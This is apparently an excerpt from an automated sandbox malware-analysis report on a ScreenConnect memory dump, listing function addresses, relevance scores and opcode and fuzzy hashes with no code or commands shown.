                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70111C7061894A8FDB89EF28C051B95B7A1FF68314B5441A8D49EDB287CF35F846CBC0
                                                                                                                                                                                                                                                        Function 00007FF7C01D5A04 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fe115d4146a3fe7a99433913f9922193fb36e0c176bea25603a6d8723720bbdf
                                                                                                                                                                                                                                                        • Instruction ID: 66f2134b968b2b4a2615b59c4863c710475c556e7c94ae9abe874dd6e5fda3df
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe115d4146a3fe7a99433913f9922193fb36e0c176bea25603a6d8723720bbdf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1611A070A18A5A8FEB59AF1850803F8F391FF9A754F840175C44DC7286DE24B805CBA1
                                                                                                                                                                                                                                                        Function 00007FF7C01DCB17 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 47862f611aa4a555ef5a917c568ac9a08fafa86b65e5d52705fc3891eda922ef
                                                                                                                                                                                                                                                        • Instruction ID: 514c17667fd6c0f3d4b7d655722b7997d95bdb6a814d10757588d375b1cb8b95
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47862f611aa4a555ef5a917c568ac9a08fafa86b65e5d52705fc3891eda922ef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC010C3150DB469BD75AFE28A041569F3D1FF96721F90093DE04A82286CF3AF446CB85
                                                                                                                                                                                                                                                        Function 00007FF7C01D9748 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5b98c46f2f77600698b6911cf83caba2d91183c5f3bc366593a4f0871d574090
                                                                                                                                                                                                                                                        • Instruction ID: a2eab0d60582621ccb7440fdd2d7e279eaac473924ed743fa4da342280ac5692
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b98c46f2f77600698b6911cf83caba2d91183c5f3bc366593a4f0871d574090
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF0F07161DB9C4FC388EF2C50102AABBD0FB89216F04057FF0DAD3B91CAA488008382
                                                                                                                                                                                                                                                        Function 00007FF7C01E6519 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 17115861f73c7f3fc206459d431e751fd883bda4983e17164042d6441f9f33aa
                                                                                                                                                                                                                                                        • Instruction ID: 262bca9b6e537bb2c7695b385e7c58a470c93d12f2aecf0cdd1671d665bf109a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17115861f73c7f3fc206459d431e751fd883bda4983e17164042d6441f9f33aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC01BC30509B458FC365EF28D494559BBE1FF5531078544A9C00ACBAA2CB39FC85CB40
                                                                                                                                                                                                                                                        Function 00007FF7C01E98C8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 69c05307e198a9f59668395c79c89e1aee769aa58fab31f6aae412fce049f82b
                                                                                                                                                                                                                                                        • Instruction ID: 4b15edc67903786c9595312eeafd868824df527df1a8f76df2df3bb066ff3fd8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69c05307e198a9f59668395c79c89e1aee769aa58fab31f6aae412fce049f82b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D301B511A0DED84FD765EB3868686FCAED1AF17620F4801FED498C72DBDA0C6C448392
                                                                                                                                                                                                                                                        Function 00007FF7C01DEAB0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9b921d3efa590ae17b5ba5f29e80f7d6f21c58c56761b156512aef010072b898
                                                                                                                                                                                                                                                        • Instruction ID: 6a9d9cf1847c0456ead0b40c0145ff4b4ddc2ffc71ec8f492f79a678bdc5a59b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b921d3efa590ae17b5ba5f29e80f7d6f21c58c56761b156512aef010072b898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCE09BB114E50C6EA61CAA55AC479F7779CE787134F40111FE58E82002F152B52386A5
                                                                                                                                                                                                                                                        Function 00007FF7C01DDB6E Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: addff8b099f8ad43ab37746b0f0a4aa8cdd5d71ac80b0ac145e5fc7cd9953773
                                                                                                                                                                                                                                                        • Instruction ID: a7734dd3787104c2efbdee86e4c6c917adbfaad3ac7511f7f2c14f6394cd2eb9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: addff8b099f8ad43ab37746b0f0a4aa8cdd5d71ac80b0ac145e5fc7cd9953773
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F0F6308086895FEF06AB2494661EDFFB0EF46214F4500EAD408CA193CF28B9198790
                                                                                                                                                                                                                                                        Function 00007FF7C01DE81D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e9c86bb997ab9f34fe610a3fc772dcad075f733609038ed18dc6f3f860db841d
                                                                                                                                                                                                                                                        • Instruction ID: d5c5e2bd3445699983f7e93bc0970797f55a2c7fe26cc2e017b37899fb7493d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9c86bb997ab9f34fe610a3fc772dcad075f733609038ed18dc6f3f860db841d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B014974A1A9198FCFD4EB28C899E98B7F0EF68311F4442D9E40DD7262DE34ADC08B00
                                                                                                                                                                                                                                                        Function 00007FF7C01D1165 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7e9dce1c9629ded749d78eb712be655ba525728321b562e3df0b1174adc4eb07
                                                                                                                                                                                                                                                        • Instruction ID: 86cf69e3a48009784ba299008d126ef8a03a96ab20d2396c526f5d79a00af88f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e9dce1c9629ded749d78eb712be655ba525728321b562e3df0b1174adc4eb07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F0A935108A0C9FCB01EF68E4919DAFBB0FF06318B020297E089C3421CB22A959CBD1
                                                                                                                                                                                                                                                        Function 00007FF7C01EA5F9 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 240fa198b65af20e46fe56046cf7ec196bdfd4e9195621e910c271c6fe0888f0
                                                                                                                                                                                                                                                        • Instruction ID: 71b827b4a28430dc9dd9d459a4b414c85fdb8323937cdb933f328c5ea50675a6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 240fa198b65af20e46fe56046cf7ec196bdfd4e9195621e910c271c6fe0888f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F0303140D69C9FCB42EB64E450DD67FB0EF17315B0541C7E049CB063D6219A59CBC2
                                                                                                                                                                                                                                                        Function 00007FF7C01D3D09 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f5cf78a6073721c3883dbcd5f578df2f5d5ea0bd159f1562be8065a1e076f03b
                                                                                                                                                                                                                                                        • Instruction ID: edb75dc7a830fcc1bd8eab434c835c62a83ab1a53ef91af1c4990d30315c3b67
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5cf78a6073721c3883dbcd5f578df2f5d5ea0bd159f1562be8065a1e076f03b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F0393540C6989FCB46EB78D4509D6BFB0FE56325B0502CBE049CB062E7219A59CB82
                                                                                                                                                                                                                                                        Function 00007FF7C01D06E1 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8d3cd208900e597c410b31bcdc7429b358e007eee9eb7ef71560f1c10f980447
                                                                                                                                                                                                                                                        • Instruction ID: 0a20e9c143d7583d1a76abe3398423cc30e8981d092564057edbb5ca644d3793
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d3cd208900e597c410b31bcdc7429b358e007eee9eb7ef71560f1c10f980447
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFE0D82110F7C40FD7439B34845C8E47FA0DE1322034900EFD481CF0B3E5199A49C792
                                                                                                                                                                                                                                                        Function 00007FF7C01D4308 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3f33eb94a616554a1ee5f83848c33e21de08820613e40e5b09ea33a4cb38b962
                                                                                                                                                                                                                                                        • Instruction ID: 18e0570cfa1c4f2607781155394146491fb5682000cac20186a7c4ce741e7a66
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f33eb94a616554a1ee5f83848c33e21de08820613e40e5b09ea33a4cb38b962
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5E09A25A4CA5347FB683A7A74A13B9E591AF41220F89417ED549C11C1CEACF8948291
                                                                                                                                                                                                                                                        Function 00007FF7C01D4310 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 427708e95d7ea674556d5d5dea2bde0a3bbc2a82ab78a2b22dfbb35105cfa4f1
                                                                                                                                                                                                                                                        • Instruction ID: 8071ff74ba46af4c6c5da94803eb566ca401793e7e8c686f93a7ed543a80967c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 427708e95d7ea674556d5d5dea2bde0a3bbc2a82ab78a2b22dfbb35105cfa4f1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EE08C2594DA2303FB6C366A74513B9E090AF45320F89407AE40DC12C5CE5CA88041A1
                                                                                                                                                                                                                                                        Function 00007FF7C01D7B65 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 27185858a9a1671483ecd17cb71369c4d96e83dfdc71d445b0a6b1b1e669d01e
                                                                                                                                                                                                                                                        • Instruction ID: 06dc468e37eb5c24eb0de20951c9951de3adbfec091b2729db86a2e2d6da3286
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27185858a9a1671483ecd17cb71369c4d96e83dfdc71d445b0a6b1b1e669d01e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDD05B41B58D5E5FD696731C64153F9D3C6DF99650B8440F2D50DC724ADD18AC4207C0
                                                                                                                                                                                                                                                        Function 00007FF7C01D9C33 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fb96f51330d00590eba71e15ea5170716b1d11c679e1bb335a2a25eda1484474
                                                                                                                                                                                                                                                        • Instruction ID: 18825df6101625aa993e5a023f148b02889e1c272d4bcd4874dde9cf5dfb8cb3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb96f51330d00590eba71e15ea5170716b1d11c679e1bb335a2a25eda1484474
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AD0923571495D8FCF80EF4CE840AEAB7A0FF99312B4104A1F61DC7215CB31E8258B40
                                                                                                                                                                                                                                                        Function 00007FF7C01E8210 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: aa17497bbf15600bc608e8c3799ffb9ed3711fe917a1ab8ccf22ddcc2d62a0d1
                                                                                                                                                                                                                                                        • Instruction ID: dfeaeabf481a49dd4dbb7bcfc9842512b4dce9310afa75ce6cec87f25386a2fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa17497bbf15600bc608e8c3799ffb9ed3711fe917a1ab8ccf22ddcc2d62a0d1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDB09203E8F14E1AE50221A87C512F8F740DB53175F991AB3E65889287988F29854291
                                                                                                                                                                                                                                                        Function 00007FF7C01D2A46 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2ede9d2666bbf2ddfc0c052a4f16d803736422b7db48f02e7b1cf273df2b9880
                                                                                                                                                                                                                                                        • Instruction ID: 7bfff395d4b632c2c22ce53b6eaaa5e169b37c754b51b28f7ebf22dfb66bf1ce
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ede9d2666bbf2ddfc0c052a4f16d803736422b7db48f02e7b1cf273df2b9880
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0C09210E08B8A5FF655FF6844452FEA1926FE9E00BD18435F66DC228ECF3CB50256A1
                                                                                                                                                                                                                                                        Function 00007FF7C01D2788 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f1f518e7e02d438d60cec8e48a1fafbadd247e24bf1b530382e80783ffbee39d
                                                                                                                                                                                                                                                        • Instruction ID: ab5d95f82aaa9478553dea4848654090253d6bf21983f3d685bd15f8806c5eb1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1f518e7e02d438d60cec8e48a1fafbadd247e24bf1b530382e80783ffbee39d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AA00200E0DA5646A462BE5810011FEC4510FB5E10BA04135F6ADC238ACF1C794215F6